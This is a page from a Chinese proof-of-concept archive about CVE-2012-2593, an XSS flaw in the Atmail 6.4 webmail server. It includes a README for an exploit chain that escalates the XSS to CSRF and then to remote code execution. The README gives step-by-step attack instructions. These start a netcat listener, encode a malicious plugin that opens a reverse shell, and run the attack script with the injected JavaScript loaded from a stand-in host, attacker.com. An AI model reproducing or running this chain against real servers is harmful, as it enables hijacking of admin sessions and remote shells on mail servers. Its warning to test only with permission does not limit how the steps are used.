POC详情: 62b5f3d197d411b7a65d5ff073822798fee03b96

来源
关联漏洞
标题: Atmail Email Server 跨站脚本漏洞 (CVE-2012-2593)
描述:AtMail是澳大利亚Atmail公司的一款开源的WebMail客户端,它提供Webmail界面、通信录管理、日历等功能,并支持IMAP、视频邮件等。 Atmail Webmail Server 6.4版本中的管理界面存在跨站脚本漏洞。远程攻击者可借助邮件的Date字段利用该漏洞注入任意的Web脚本或HTML。
描述
Atmail XSS-CSRF-RCE Exploit Chain
介绍
# Atmail XSS-CSRF-RCE Exploit Chain PoC 

atmail-rce.py: Exploits CVE-2012-2593 in Atmail's webmail interface.

atmail-csrf.js: Javascript file which leverages CVE 2012-2593 into a CSRF 
                to install a malicious plugin which executes a reverse shell

Plugin.php: Atmail plugin to be installed which calls a reverse shell

**!!Only use against servers on which you have permission to test**

## Summary
 Atmail email server version 6.4 has a XSS vulnerability in both the *Date* email header
 and the *Email Body* (via iFrame injection). This is leveraged into a CSRF using the 
 javascript XHR api to send a request with the admin user's cookie to the admin webpanel, 
 installing a malicious Plugin which executes code for a reverse shell.  

## Proof of Concept
1. Start a netcat listener 
   `nc -lvp 4444`
2. Open Plugin.php and change the IP address and Port to that of your netcat listener
3. compress Plugin using gzip and encode in base64
   `gzip -c Plugin.php | base64 | tr -d [:space:]`
4. Copy and Paste the above output into the atmail-csrf.js data variable
5. Run the atmail-rce.py script 
   `python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/ `
6. Wait until the admin user logs into their email

## Caveats
* Only works if target of XSS is an admin user of Atmail
* Only works if target is signed in to both the webmail interface and the admin interface of the server
* Only works if plugin installation is allowed on the server (on by default)
文件快照

[4.0K] /data/pocs/62b5f3d197d411b7a65d5ff073822798fee03b96 ├── [5.2K] atmail-csrf.js ├── [5.3K] atmail-rce.py ├── [ 754] Plugin.php └── [1.5K] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。